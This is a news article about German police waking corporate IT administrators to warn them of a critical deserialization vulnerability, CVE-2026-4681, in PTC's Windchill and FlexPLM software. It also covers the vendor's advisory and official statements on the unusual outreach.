Police Fanned Out Early Sunday Brandishing an Advisory of a CVSS 10 Vulnerability
In an unprecedented move, police officers throughout Germany reached out to corporate IT administrators in the early hours of Sunday morning, delivering urgent warnings regarding a critical vulnerability in widely used product lifecycle management software developed by the American vendor PTC. This proactive approach underscored the gravity of the situation, as officials aimed to mitigate potential risks posed by this newly identified flaw.
The officers conveyed a sense of urgency, cautioning the administrators that malicious actors were likely to exploit this vulnerability in PTC’s Windchill software, utilized by manufacturers, and its FlexPLM product, favored by brands and retailers. The police warned that attackers could leverage the vulnerability to exfiltrate sensitive data and deploy crypto-locking ransomware, heightening the stakes for corporate entities that had not yet patched the flaw.
This vulnerability, designated CVE-2026-4681 and registered under WID-SEC-2026-0822 by the Federal Office for Information Security in Germany, carries an alarming CVSS v4 base score of 9.3 and a maximum CVSS v3.1 base score of 10. The vulnerability allows for remote code execution via the deserialization of untrusted data, a process of converting raw data into usable objects in memory.
While PTC released an advisory stating, “no evidence of confirmed exploitation affecting PTC customers” existed, it nevertheless outlined various indicators of compromise. The advisory urged companies to notify their security teams immediately upon identifying any of these indicators on their Windchill Server. Additionally, it provided instructions for applying workarounds for Apache and IIS HTTP servers, emphasizing the importance of prompt action irrespective of the systems’ visibility on the internet. If immediate action was impractical, companies were advised to temporarily disconnect from the internet. PTC also assured customers of around-the-clock support, regardless of their existing support contracts, emphasizing their commitment to addressing concerns associated with the vulnerability.
Mach Schneller! Es Gibt Eine CVE!
The extraordinary measures taken by Germany’s Federal Criminal Police Office to mobilize companies’ administrators for urgent patching efforts have raised eyebrows and sparked discussions across various platforms. Many commenters on German cybersecurity publication Heise and IT blogs such as BornCity reported that police officers visited the homes of some system administrators at around 3 a.m. or 4 a.m., presenting physical copies of the advisory sent by PTC the day before. In some cases, police had attempted to reach the admins by phone before their in-person visits, but many recipients mistook the calls for scams or jokes and chose not to answer. Some individuals even reported that their companies weren’t utilizing the affected PTC products.
One particularly surprised comment captured the general sentiment: “We’re astonished by this approach. PTC usually manages such vulnerabilities without panic. Fixes typically arrive during the next CPS update.” This level of proactive intervention by law enforcement was described as a remarkable deviation from the norm. No individuals in the discussions indicated having previously encountered such police involvement in cybersecurity issues.
Detective Chief Inspector Philipp Hasse, a spokesperson for the Lower Saxony State Criminal Police Office, confirmed to Information Security Media Group on Wednesday that the Federal Criminal Police Office had provided a list of affected companies. Their cybercrime unit began phoning these companies on Saturday evening and proceeded to visit those deemed unreachable by phone.
Hasse clarified, “The objective was to heighten awareness and encourage the swift implementation of protective measures.” He elaborated that companies unable to be contacted by phone were informed via email, which contained a detailed warning about the critical vulnerability along with specific recommendations for risk mitigation based on the vendor’s advisories. The Lower Saxony State Criminal Police considered this immediate notification both effective and targeted in aiming to prevent further and potentially severe damage to the affected companies.
Additionally, Hasse verified the legitimacy of an email sent by his office to the companies, which a BornCity blog reader had flagged. This communication noted “concrete evidence” of the affected software’s usage within the companies in question. The email warned that the vulnerability in Windchill was anticipated to be actively exploited by cybercriminals, potentially leading to data theft and ransomware execution. Consequently, an independent review was requested urgently, emphasizing the likelihood of imminent cyberattacks.
While PTC had not responded to a request for comment at the time of publication, representatives from the BKA confirmed that such measures are within standard operating procedures when a concrete threat is assessed. They had become aware of the critical vulnerability last Friday and subsequently informed the state criminal police offices, thereby ensuring the timely dissemination of crucial information to mitigate risks posed by impending cyber threats.